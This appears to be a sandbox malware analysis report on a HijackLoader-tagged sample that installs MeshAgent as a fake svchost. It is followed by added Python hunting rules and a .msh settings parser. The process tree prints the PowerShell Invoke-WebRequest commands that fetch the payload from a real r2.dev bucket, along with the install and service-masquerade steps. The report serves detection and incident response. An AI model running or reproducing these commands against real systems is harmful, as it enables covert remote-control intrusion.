Analysis

  • max time kernel
    149s
  • max time network
    142s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64 arch:x86 image:win10v2004-20241007-en locale:en-us os:windows10-2004-x64 system
  • submitted
    12-10-2024 07:04

General

  • Target

    2024-10-12_8fd2994edebc3a3ddde2a14b3f5c4183_hijackloader_poet-rat_snatch.exe

  • Size

    10.1MB

  • MD5

    8fd2994edebc3a3ddde2a14b3f5c4183

  • SHA1

    51b0c1f0e5d9a1486ee49bf25e544e626a5c86c0

  • SHA256

    c4c71ad59b09f47d5d8c1f1ba54a358d1793706f00651867fb171e8f4d2912b4

  • SHA512

    62620e6d802471ae663c89916f12fd3b68931cb141d80dc2444129f2d1b3f56a9a1630028d18ea08c6c8a595538bf114d24cb56269812f8bfd3c06c3ec1464eb

  • SSDEEP

    196608:9RFHibb0Dpz7Omna1cCwvylAjWZ0Xq9YLuxMfCVb2XGh22KNL7P+wherA+O7f:tibgDpz7TnaqtvylAjWZ0Xq9YLuxMfC4

Malware Config

Signatures

  • Detects MeshAgent payload 5 IoCs
  • MeshAgent

    MeshAgent is the open-source remote management agent of the MeshCentral project, written in C with an embedded JavaScript engine. It is legitimate software, but because it hands full remote control of the host to whichever MeshCentral server its settings file names, it is routinely deployed by attackers as a remote access trojan.

  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Runs commands through powershell.exe.

  • Downloads MZ/PE file
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Executes dropped EXE 3 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops file in System32 directory 64 IoCs
  • UPX packed file 7 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempts to gather information about the system language of the victim host in order to infer its geographical location.

  • Modifies data under HKEY_USERS 52 IoCs
  • Suspicious behavior: EnumeratesProcesses 14 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 35 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2024-10-12_8fd2994edebc3a3ddde2a14b3f5c4183_hijackloader_poet-rat_snatch.exe
    "C:\Users\Admin\AppData\Local\Temp\2024-10-12_8fd2994edebc3a3ddde2a14b3f5c4183_hijackloader_poet-rat_snatch.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4588
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3636
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "New-Item -ItemType Directory -Force -Path C:\Users\Admin\AppData\local\svchost"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:764
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "C:\Users\Admin\AppData\local\svchost\svchost.exe -uninstall"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:376
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Invoke-WebRequest https://pub-fd29cd63fb8c4b7fb0c7d3fa893212b9.r2.dev/svchost.exe -OutFile C:\Users\Admin\AppData\local\svchost\svchost.exe"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2368
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Invoke-WebRequest https://pub-fd29cd63fb8c4b7fb0c7d3fa893212b9.r2.dev/svchost.msh -OutFile C:\Users\Admin\AppData\local\svchost\svchost.msh"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3176
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "C:\Users\Admin\AppData\local\svchost\svchost.exe -install"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1480
        • C:\Users\Admin\AppData\local\svchost\svchost.exe
          "C:\Users\Admin\AppData\local\svchost\svchost.exe" -install
          4⤵
          • Sets service image path in registry
          • Executes dropped EXE
          PID:3284
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c explorer.exe "_가이아서버 접속기.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4564
      • C:\Windows\explorer.exe
        explorer.exe "_가이아서버 접속기.exe"
        3⤵
        PID:3564
  • C:\Windows\explorer.exe
    C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3388
    • C:\Users\Admin\AppData\Local\Temp\_가이아서버 접속기.exe
      "C:\Users\Admin\AppData\Local\Temp\_가이아서버 접속기.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:60
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 60 -s 420
        3⤵
        • Program crash
        PID:4296
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 60 -ip 60
    1⤵
    PID:4580
  • C:\Users\Admin\AppData\local\svchost\svchost.exe
    "C:\Users\Admin\AppData\local\svchost\svchost.exe" --meshServiceName="Microsoft"
    1⤵
    • Executes dropped EXE
    • Drops file in System32 directory
    • Modifies data under HKEY_USERS
    • Suspicious use of WriteProcessMemory
    PID:668
    • C:\Windows\System32\wbem\wmic.exe
      wmic SystemEnclosure get ChassisTypes
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:4340
    • C:\Windows\system32\wbem\wmic.exe
      wmic os get oslanguage /FORMAT:LIST
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:4972
    • C:\Windows\System32\wbem\wmic.exe
      wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:4292
    • C:\Windows\system32\wbem\wmic.exe
      wmic os get oslanguage /FORMAT:LIST
      2⤵
      PID:4968
    • C:\Windows\System32\wbem\wmic.exe
      wmic SystemEnclosure get ChassisTypes
      2⤵
      PID:1452
    • C:\Windows\System32\wbem\wmic.exe
      wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
      2⤵
      PID:4872
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -noprofile -nologo -command -
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      PID:1536
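The process tree above is the complete installation procedure: the sample pipes a script into `powershell -`, which creates C:\Users\Admin\AppData\local\svchost, fetches svchost.exe and svchost.msh from the r2.dev bucket, and registers the agent with `svchost.exe -install`; the resulting service runs as `svchost.exe --meshServiceName="Microsoft"` and fingerprints the host with three wmic queries. The following is an added hunting example and is not part of the sandbox report: it runs detection rules for each stage of that chain over constructed process-creation events modelled on this tree (Sysmon-style field names, not captured telemetry). The rule names and the System32/SysWOW64 allowlist are my own choices.

```python
"""Hunt for the MeshAgent drop-and-install chain in process-creation events.

Added example, not part of the sandbox report. SAMPLE_EVENTS is CONSTRUCTED
to mirror the report's process tree (image, command line, pid, parent pid);
it is not captured telemetry. Rule names and SYSTEM_DIRS are assumptions.
"""
import re
from collections import defaultdict

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
DROP = r"C:\Users\Admin\AppData\local\svchost\svchost.exe"
CDN = "https://pub-fd29cd63fb8c4b7fb0c7d3fa893212b9.r2.dev"
WMIC = r"C:\Windows\System32\wbem\wmic.exe"

# Constructed sample: the report's chain plus one benign svchost.exe (pid 900).
SAMPLE_EVENTS = [
    {"pid": 3636, "ppid": 4588, "image": PS, "cmdline": "powershell -"},
    {"pid": 2368, "ppid": 3636, "image": PS,
     "cmdline": f'"{PS}" -Command "Invoke-WebRequest {CDN}/svchost.exe -OutFile {DROP}"'},
    {"pid": 3176, "ppid": 3636, "image": PS,
     "cmdline": f'"{PS}" -Command "Invoke-WebRequest {CDN}/svchost.msh '
                r'-OutFile C:\Users\Admin\AppData\local\svchost\svchost.msh"'},
    {"pid": 3284, "ppid": 1480, "image": DROP, "cmdline": f'"{DROP}" -install'},
    {"pid": 668, "ppid": 0, "image": DROP,
     "cmdline": f'"{DROP}" --meshServiceName="Microsoft"'},
    {"pid": 4340, "ppid": 668, "image": WMIC,
     "cmdline": "wmic SystemEnclosure get ChassisTypes"},
    {"pid": 4972, "ppid": 668, "image": WMIC,
     "cmdline": "wmic os get oslanguage /FORMAT:LIST"},
    {"pid": 4292, "ppid": 668, "image": WMIC,
     "cmdline": r'wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"'},
    {"pid": 900, "ppid": 700, "image": r"C:\Windows\System32\svchost.exe",
     "cmdline": r"C:\Windows\System32\svchost.exe -k netsvcs"},
]

SYSTEM_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64")
DOWNLOAD_RE = re.compile(r"invoke-webrequest\s+(\S+)\s+-outfile\s+(\S+)", re.I)
MESH_FLAGS = ("--meshservicename=", " -install", " -uninstall")
FINGERPRINT_QUERIES = ("systemenclosure get chassistypes",
                       "os get oslanguage",
                       "computersystem get pcsystemtype")


def _split(path):
    """Return (directory, filename) of a Windows path, both lower-cased."""
    d, _, f = path.lower().rpartition("\\")
    return d, f


def _in_user_profile(path):
    d, _ = _split(path)
    return "\\users\\" in d and "\\appdata\\" in d


def rule_download_to_user_dir(ev):
    """PowerShell Invoke-WebRequest writing an executable or .msh under AppData."""
    if _split(ev["image"])[1] != "powershell.exe":
        return None
    m = DOWNLOAD_RE.search(ev["cmdline"])
    if not m:
        return None
    url, out = m.group(1), m.group(2).strip('"')
    if _in_user_profile(out) and out.lower().endswith((".exe", ".dll", ".msh")):
        return f"{url} written to {out}"
    return None


def rule_svchost_masquerade(ev):
    """A binary named svchost.exe that does not live in System32/SysWOW64."""
    d, f = _split(ev["image"])
    if f == "svchost.exe" and d not in SYSTEM_DIRS:
        return f"svchost.exe running from {ev['image']}"
    return None


def rule_meshagent_service_control(ev):
    """MeshAgent service switches on a binary that lives in the user profile."""
    cl = ev["cmdline"].lower()
    if _in_user_profile(ev["image"]) and any(flag in cl for flag in MESH_FLAGS):
        return f"service control switch in {ev['cmdline']}"
    return None


PER_EVENT_RULES = {
    "download_to_user_dir": rule_download_to_user_dir,
    "svchost_masquerade": rule_svchost_masquerade,
    "meshagent_service_control": rule_meshagent_service_control,
}


def rule_wmic_fingerprint(events):
    """All three host-fingerprint wmic queries issued by the same parent pid."""
    seen = defaultdict(set)
    for ev in events:
        if _split(ev["image"])[1] != "wmic.exe":
            continue
        cl = " ".join(ev["cmdline"].lower().split())
        for q in FINGERPRINT_QUERIES:
            if q in cl:
                seen[ev["ppid"]].add(q)
    return [(ppid, sorted(qs)) for ppid, qs in seen.items()
            if qs == set(FINGERPRINT_QUERIES)]


def hunt(events):
    """Return a list of {rule, pid, detail} findings over a batch of events."""
    findings = []
    for ev in events:
        for name, rule in PER_EVENT_RULES.items():
            detail = rule(ev)
            if detail:
                findings.append({"rule": name, "pid": ev["pid"], "detail": detail})
    for ppid, queries in rule_wmic_fingerprint(events):
        findings.append({"rule": "wmic_host_fingerprint", "pid": ppid,
                         "detail": "parent issued " + ", ".join(queries)})
    return findings


if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"[{f['rule']}] pid={f['pid']}: {f['detail']}")
```

The wmic rule is deliberately a sequence rule keyed on the parent pid: any one of those queries is common in admin scripts, but the ChassisTypes, OSLanguage and PCSystemType triple from one non-system parent is the MeshAgent startup fingerprint seen twice in this run.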

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

    Filesize

    2KB

    MD5

    6cf293cb4d80be23433eecf74ddb5503

    SHA1

    24fe4752df102c2ef492954d6b046cb5512ad408

    SHA256

    b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

    SHA512

    0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    64B

    MD5

    1a11402783a8686e08f8fa987dd07bca

    SHA1

    580df3865059f4e2d8be10644590317336d146ce

    SHA256

    9b1d1b468932a2d88548dc18504ac3066f8248079ecb083e919460bdb88398c0

    SHA512

    5f7f9f76d9d12a25fdc5b8d193391fb42c37515c657250fe01a9bfd9fe4cc4eab9d5ec254b2596ac1b9005f12511905f19fdae41f057062261d75bd83254b510

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    944B

    MD5

    96ff1ee586a153b4e7ce8661cabc0442

    SHA1

    140d4ff1840cb40601489f3826954386af612136

    SHA256

    0673399a2f37c89d455e8658c4d30b9248bff1ea47ba40957588e2bc862976e8

    SHA512

    3404370d0edb4ead4874ce68525dc9bcbc6008003682646e331bf43a06a24a467ace7eff5be701a822d74c7e065d0f6a0ba0e3d6bc505d34d0189373dcacb569

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    e5063fb2c6625068c1224c68b5c1ce46

    SHA1

    8867a7637689af271e445a7379c810335591e708

    SHA256

    2bfdeab5f252777c7bbbb7b8b033e03e37d3e2061dce73c8af03c196e1b26bfe

    SHA512

    ad62e5268c8fe5b7b72d40d8724ab7ae2fa3d3e910122ad36f61e6c1ec81c22e1ef3b4477006085212b20342aa073ee2275e0095e92c4ac350df6814149aca58

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    8a12c129e02e3d0e0ff14020158d6e53

    SHA1

    383434d0df826622f06b1f3811124782df21507b

    SHA256

    e0c11799edb944329f9ec85fd54a7038ea7df63d6a07162bc36fc03edb1bceb7

    SHA512

    4b6f2a88fc882ea9c05e9d8819114e35f30deae4366eafd1ec509d87cb02a26f2441b987272713725cbab9684233309e084802e7475876917fe9d6ab9e9cd05d

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1yp0eioo.pub.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\Temp\_가이아서버 접속기.exe

    Filesize

    2.7MB

    MD5

    c5fc53d3969bea56dc506c473b805c13

    SHA1

    7c59712142fe98d48ca6276851ee890585c9772a

    SHA256

    21956ec4108a00fc6aae28ffa52ebb3dd76a1d9d1adac9648df2a6354646052c

    SHA512

    79d45c966c534831b26e71b48f0a0690a8a61e4d47998deb1b2e35fb50a26fdea072db34805c7e1db35f105e3bd062f05094b102d5d6290bfa20c0847485856b

  • C:\Users\Admin\AppData\Local\svchost\svchost.db.tmp

    Filesize

    131KB

    MD5

    72085bad44dad6707a598fd489c6850d

    SHA1

    37f2e77c5a5e1981c2753b974017d1842965f910

    SHA256

    cc591d737cad43ec26a49ddb9128c42d709b0f0cff9630b77c963a263439e56f

    SHA512

    0be7a5c2c1d351f4d041b9525c307dcdb8f365c543e7d1eb44761812458895be65f776c8dd5cc85ddfe9defe922f5c468ff266c242ccc895b928f388b70552ca

  • C:\Users\Admin\AppData\local\svchost\svchost.exe

    Filesize

    1.6MB

    MD5

    400b9faa5f261a5a0d194e633483571c

    SHA1

    b5bf2b5692d6e2eb800406d77a5f1de6a852ede8

    SHA256

    1dbe9d36ce4a1dfb469fb20c1b2b8964e5e08a96f3cf46ba6bdfc27247d97b65

    SHA512

    3cce6f30a3c2c2b09d13292d0de3fc0809f3617874e642b914ec9ee3982a915d20bfd25b9db40e3dc63b390ffcb9ef57654b9d82760b4a2ab3f4cc76914164d5

  • C:\Users\Admin\AppData\local\svchost\svchost.msh

    Filesize

    22KB

    MD5

    90f91efb0b6cc632ea6b2bb3a6d5fb40

    SHA1

    e46a39e7252e086f34d64c3d720442cd325de506

    SHA256

    7db6fa16d92fa026ba88337e51623caea566a78eb275af77905286a533792fc9

    SHA512

    f511124b19a4f05e09f253f5f63e991694565247f9c09430368f53d5466ecb8822811107c7c0a9e91e8d1b0ff85bfa37a243b0635eb893c8fae39ea8152c3928

  • memory/60-42-0x0000000000890000-0x0000000000B4C000-memory.dmp

    Filesize

    2.7MB

  • memory/668-134-0x00007FF64DA20000-0x00007FF64DDA4000-memory.dmp

    Filesize

    3.5MB

  • memory/668-123-0x00007FF64DA20000-0x00007FF64DDA4000-memory.dmp

    Filesize

    3.5MB

  • memory/668-122-0x00007FF64DA20000-0x00007FF64DDA4000-memory.dmp

    Filesize

    3.5MB

  • memory/668-85-0x00007FF64DA20000-0x00007FF64DDA4000-memory.dmp

    Filesize

    3.5MB

  • memory/3284-81-0x00007FF64DA20000-0x00007FF64DDA4000-memory.dmp

    Filesize

    3.5MB

  • memory/3284-87-0x00007FF64DA20000-0x00007FF64DDA4000-memory.dmp

    Filesize

    3.5MB

  • memory/3636-2-0x00007FFA10103000-0x00007FFA10105000-memory.dmp

    Filesize

    8KB

  • memory/3636-17-0x00007FFA10100000-0x00007FFA10BC1000-memory.dmp

    Filesize

    10.8MB

  • memory/3636-84-0x00007FFA10100000-0x00007FFA10BC1000-memory.dmp

    Filesize

    10.8MB

  • memory/3636-80-0x00007FFA10103000-0x00007FFA10105000-memory.dmp

    Filesize

    8KB

  • memory/3636-13-0x00007FFA10100000-0x00007FFA10BC1000-memory.dmp

    Filesize

    10.8MB

  • memory/3636-90-0x00007FFA10100000-0x00007FFA10BC1000-memory.dmp

    Filesize

    10.8MB

  • memory/3636-14-0x0000024773320000-0x0000024773364000-memory.dmp

    Filesize

    272KB

  • memory/3636-15-0x00007FFA10100000-0x00007FFA10BC1000-memory.dmp

    Filesize

    10.8MB

  • memory/3636-3-0x0000024772E10000-0x0000024772E32000-memory.dmp

    Filesize

    136KB

  • memory/3636-16-0x0000024773370000-0x00000247733E6000-memory.dmp

    Filesize

    472KB
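The svchost.msh listed above is the MeshAgent settings file that svchost.exe reads at install time; it is what tells the agent which MeshCentral server to connect to, so it is the artifact to pull from an infected host to identify the operator's infrastructure. The report only lists it by hash, so the following is an added example, not part of the report and not the real file's contents: it parses a constructed .msh with placeholder server name and identifiers, assuming the usual MeshAgent layout of one key=value setting per line (MeshName, MeshType, MeshID, ServerID, MeshServer, plus any extra keys), and checks the server against a hypothetical allowlist of MeshCentral servers the organisation actually runs.

```python
"""Pull the command-and-control endpoint out of a MeshAgent .msh settings file.

Added example, not part of the sandbox report. SAMPLE_MSH is CONSTRUCTED: the
hostname and the MeshID/ServerID values are placeholders, not the real
svchost.msh. Assumes the usual MeshAgent key=value layout; APPROVED_SERVERS is
a hypothetical allowlist.
"""
from urllib.parse import urlparse

SAMPLE_MSH = """\
MeshName=Default
MeshType=2
MeshID=0x0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF
ServerID=FEDCBA9876543210FEDCBA9876543210FEDCBA9876543210
MeshServer=wss://agent.example.invalid:443/agent.ashx
"""

REQUIRED_KEYS = ("MeshID", "ServerID", "MeshServer")
# Hypothetical allowlist: MeshCentral servers this organisation really operates.
APPROVED_SERVERS = {"mesh.corp.example.invalid"}


def parse_msh(text):
    """Return the key=value settings as a dict.

    A UTF-8 BOM, blank lines and lines without '=' are ignored; every key
    found is kept, not only the required ones, so extra settings survive.
    """
    settings = {}
    for raw in text.lstrip("\ufeff").splitlines():
        line = raw.strip()
        if not line or "=" not in line:
            continue
        key, _, value = line.partition("=")
        settings[key.strip()] = value.strip()
    return settings


def assess_msh(text, approved=APPROVED_SERVERS):
    """Classify a .msh by the server it points at.

    Returns the parsed server host/port/scheme, the MeshID and ServerID (the
    values to pivot on when searching other hosts for the same operator), any
    missing required keys, and a verdict: 'approved', 'rogue' or 'incomplete'.
    """
    settings = parse_msh(text)
    missing = [k for k in REQUIRED_KEYS if k not in settings]
    url = urlparse(settings.get("MeshServer", ""))
    host = url.hostname
    if missing or not host:
        verdict = "incomplete"
    elif host in approved:
        verdict = "approved"
    else:
        verdict = "rogue"
    return {
        "verdict": verdict,
        "server_host": host,
        "server_port": url.port,
        "scheme": url.scheme,
        "mesh_id": settings.get("MeshID"),
        "server_id": settings.get("ServerID"),
        "missing": missing,
    }


if __name__ == "__main__":
    result = assess_msh(SAMPLE_MSH)
    print(f"{result['verdict']}: {result['scheme']}://{result['server_host']}:"
          f"{result['server_port']} (ServerID {result['server_id']})")
```

ServerID is the fingerprint of the server certificate the agent will trust, so a match on it across hosts ties them to the same operator even when the MeshServer hostname changes; a verdict of "rogue" on a host where no MeshCentral deployment is sanctioned is the response trigger.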